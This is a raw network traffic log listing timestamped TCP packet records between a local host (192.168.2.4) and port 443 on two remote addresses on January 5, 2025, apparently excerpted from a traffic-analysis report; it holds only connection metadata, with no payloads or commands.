                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:19.481411934 CET44349750104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:19.481515884 CET44349750104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:19.481586933 CET49750443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:19.481694937 CET49750443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:19.481709957 CET44349750104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:19.590568066 CET49751443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:19.590619087 CET44349751104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:19.590692043 CET49751443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:19.590986013 CET49751443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:19.590998888 CET44349751104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:20.066534042 CET44349751104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:20.066657066 CET49751443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:20.089359999 CET49751443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:20.089385986 CET44349751104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:20.089634895 CET44349751104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:20.109514952 CET49751443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:20.109613895 CET49751443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:20.109641075 CET44349751104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:20.640764952 CET44349751104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:20.640865088 CET44349751104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:20.640923977 CET49751443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:20.641096115 CET49751443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:20.641113997 CET44349751104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:20.826534986 CET49752443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:20.826580048 CET44349752104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:20.826642990 CET49752443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:20.827831984 CET49752443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:20.827847958 CET44349752104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:21.303435087 CET44349752104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:21.303530931 CET49752443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:21.309133053 CET49752443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:21.309144020 CET44349752104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:21.309387922 CET44349752104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:21.310583115 CET49752443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:21.310715914 CET49752443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:21.310746908 CET44349752104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:21.310810089 CET49752443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:21.310817957 CET44349752104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:22.234651089 CET44349752104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:22.234750032 CET44349752104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:22.234797955 CET49752443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:22.235145092 CET49752443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:22.235162020 CET44349752104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:22.983515978 CET49753443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:22.983562946 CET44349753104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:22.983848095 CET49753443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:22.984354019 CET49753443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:22.984365940 CET44349753104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:23.459888935 CET44349753104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:23.459990978 CET49753443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:23.464291096 CET49753443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:23.464303970 CET44349753104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:23.464555025 CET44349753104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:23.465815067 CET49753443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:23.465914965 CET49753443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:23.465920925 CET44349753104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:23.941768885 CET44349753104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:23.941848993 CET44349753104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:23.941927910 CET49753443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:23.942102909 CET49753443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:23.942116976 CET44349753104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:24.030069113 CET49755443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:24.030109882 CET44349755104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:24.030316114 CET49755443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:24.030610085 CET49755443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:24.030623913 CET44349755104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:24.497001886 CET44349755104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:24.497113943 CET49755443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:24.498403072 CET49755443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:24.498409986 CET44349755104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:24.498661995 CET44349755104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:24.500061989 CET49755443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:24.500138998 CET49755443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:24.500144005 CET44349755104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:25.062330961 CET44349755104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:25.062442064 CET44349755104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:25.062659979 CET49755443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:25.062752962 CET49755443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:25.062776089 CET44349755104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:25.066040039 CET49756443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:25.066088915 CET44349756104.21.87.8192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:25.066184998 CET49756443192.168.2.4104.21.87.8
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.138561010 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.138567924 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.138603926 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.138781071 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.138822079 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.138832092 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.138861895 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.138876915 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.138884068 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.138900995 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.139262915 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.139293909 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.139322996 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.139339924 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.139353991 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.139638901 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.139679909 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.139682055 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.139691114 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.139724016 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.139731884 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.139739037 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.139772892 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.139803886 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.139848948 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.140558958 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.140609026 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.140629053 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.140635014 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.140669107 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.181054115 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.181113005 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.181134939 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.181181908 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.225054979 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.225115061 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.225294113 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.225336075 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.225341082 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.225351095 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.225368023 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.225374937 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.225416899 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.225423098 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.225461960 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.225541115 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.225650072 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.225769997 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.225821972 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.225830078 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.225855112 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.225872993 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.225879908 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.225919008 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.226241112 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.226294994 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.226305962 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.226351976 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.226414919 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.226460934 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.226515055 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.226561069 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.226562977 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.226571083 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.226596117 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.226600885 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.226640940 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.226646900 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.226684093 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.227129936 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.227173090 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.227366924 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.227408886 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.227421045 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.227426052 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.227443933 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.227454901 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.227494001 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.227499008 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.227636099 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.229998112 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.230031967 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.230062008 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.230071068 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.230103016 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.230118990 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.230134010 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.486835957 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.486852884 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.486910105 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.486917973 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.486958981 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.487030983 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.487046957 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.487093925 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.487101078 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.487138987 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.487513065 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.487529039 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.487581968 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.487588882 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.487627983 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.487994909 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.488009930 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.488054991 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.488063097 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.488095999 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.488102913 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.528912067 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.528938055 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.528992891 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.529005051 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.529015064 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.529050112 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.572894096 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.572917938 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.572972059 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.572984934 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.573029041 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.573139906 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.573156118 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.573204041 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.573210955 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.573251009 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.573487043 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.573503017 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.573550940 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.573559046 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.573600054 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.573911905 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.573929071 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.573961973 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.573968887 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.573993921 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.574013948 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.574223995 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.574244976 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.574291945 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.574300051 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.574383974 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.574476957 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.574495077 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.574532986 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.574541092 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.574573994 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.574594021 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.574656010 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.574672937 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.574704885 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.574712992 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.574744940 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.574759960 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.582354069 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.615591049 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.615639925 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.615698099 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.615714073 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.615724087 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.617700100 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.632518053 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.659914970 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.659933090 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.659995079 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.660031080 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.660043955 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.660160065 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.660180092 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.660213947 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.660222054 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.660234928 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.660270929 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.660379887 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.660393953 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.660433054 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.876758099 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.876828909 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.876841068 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.876878023 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.879787922 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.920795918 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.920814037 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.920871019 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.920906067 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.920938969 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:28.920938969 CET49758443192.168.2.4172.67.208.58
